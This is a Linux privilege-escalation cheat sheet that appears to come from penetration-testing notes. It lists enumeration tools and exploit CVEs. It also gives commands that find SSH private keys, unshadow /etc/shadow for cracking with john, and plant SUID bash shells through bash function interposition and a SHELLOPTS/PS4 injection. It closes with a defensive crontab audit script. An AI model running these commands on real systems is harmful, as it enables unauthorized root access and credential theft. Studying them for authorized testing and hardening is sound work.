# Linux Privilege Escalation
## Links
* [Basics](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
* [LinEnum](https://github.com/rebootuser/LinEnum)
* [Smart Enumeration](https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh)
* [Linux Exploit Suggester](https://github.com/mzet-/linux-exploit-suggester)
* [GTFObins](https://gtfobins.github.io/)
* [Linpeas](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS)
## Kernel Exploits
### Dirty COW
* [CVE-2016-5195](https://dirtycow.ninja/)
* [c0w.c](../kernel-exploits/dirtycow)
## Stored Keys & Passwords
* History
* Environment Variables
* Config + Dot Files
* SSH keys
```sh
# Group the -name tests so -type f applies to both names
find / -type f \( -name "authorized_keys" -o -name "id_rsa" \) 2>/dev/null
```
## Permissions
* Weak permissions
* Umask
* Unshadow via `unshadow /etc/passwd /etc/shadow > unshadow.txt` and john or hashcat.
  * e.g. `john --wordlist=./wordlist --format=crypt hash`
* SUID
* list
```sh
find / -perm /6000 -ls 2>/dev/null
```
* [Shared object injection](../../../exploit/linux/shared_object_injection.md)
* [CVE-2016-1247](https://www.cvedetails.com/cve/CVE-2016-1247/)
* User specific files
```sh
find / -user root -name "*.txt"
```
## Sudo Binary
* [Baron Samedit](../../../exploit/linux/sudo/baron_samedit.md)
* [CVE-2019-14287](../../../exploit/linux/sudo/CVE_2019_14287.md)
* [CVE-2019-18634](../../../exploit/linux/sudo/CVE_2019_18634.md)
* [LD_PRELOAD](../../../exploit/linux/ld_preload.md)
* `sudo -l`
* Take a look at GTFObins
* Keep an eye on the displayed host and env capabilities
## PATH Hijacking
* Interpositioning binaries via PATH
* Look for binaries used in other bins and scripts
* Interposition a binary of the same name and put its directory at the front of `$PATH`
## Bash function
* Interpositioning of binaries via bash functions
```sh
function /path/to/binary() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
```
```sh
export -f /path/to/binary
```
* Call binary which invokes this function
## Environment Variable
```sh
env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +s /tmp/bash)' /bin/sh -c '<binary>; set +x; /tmp/bash -p'
```
## Capabilities
* [capabilities](../../../exploit/linux/capabilities.md)
## Crontab
* Check `cat /etc/crontab`
* Check writable scripts and binaries that are scheduled
* Check `$PATH` order
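
The three crontab checks above as one audit function for hardening reviews. This is an added example, not part of the original notes; the function names and the finding labels (`WRITABLE_PATH_DIR`, `WRITABLE_TARGET`, `PATH_LOOKUP`) are made up here, and GNU find is assumed.

```shell
#!/bin/sh
# Added example: defensive audit of a system crontab (default /etc/crontab).
# Assumes GNU find (-perm /mode), as the find commands on this page do.
# Only permission bits are checked; file ownership is not.

# True if the path (symlinks followed) is group- or world-writable.
is_loose() {
    [ -n "$(find -L "$1" -maxdepth 0 -perm /022 2>/dev/null)" ]
}

# Prints one finding per line:
#   WRITABLE_PATH_DIR <dir>      directory in cron's PATH others can write to
#   WRITABLE_TARGET <user> <cmd> scheduled file others can modify
#   PATH_LOOKUP <user> <cmd>     command resolved through PATH at run time
audit_crontab() {
    file=${1:-/etc/crontab}

    # PATH order: every directory cron searches should be writable by root only.
    sed -n 's/^[[:space:]]*PATH=//p' "$file" | tail -n 1 | tr ':' '\n' |
    while read -r dir; do
        [ -n "$dir" ] || continue
        if is_loose "$dir"; then echo "WRITABLE_PATH_DIR $dir"; fi
    done

    # Job lines: "m h dom mon dow user command" or "@keyword user command".
    # Comments, blank lines and NAME=value assignments are skipped.
    awk '!/^[ \t]*(#|$)/ && !/^[ \t]*[A-Za-z_][A-Za-z0-9_]*[ \t]*=/ {
             n = ($1 ~ /^@/) ? 2 : 6          # field that holds the user
             if (NF > n) print $n, $(n + 1)   # user and first command word
         }' "$file" |
    while read -r user cmd; do
        case $cmd in
            /*) if is_loose "$cmd"; then echo "WRITABLE_TARGET $user $cmd"; fi ;;
            *)  echo "PATH_LOOKUP $user $cmd" ;;
        esac
    done
    return 0
}
```

Source the file and run `audit_crontab` (or `audit_crontab /path/to/crontab`); any `PATH_LOOKUP` job should be rewritten to use an absolute path.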
## NFS Rootsquash
* [nfs rootsquash](../../../exploit/linux/nfs_rootsquash.md)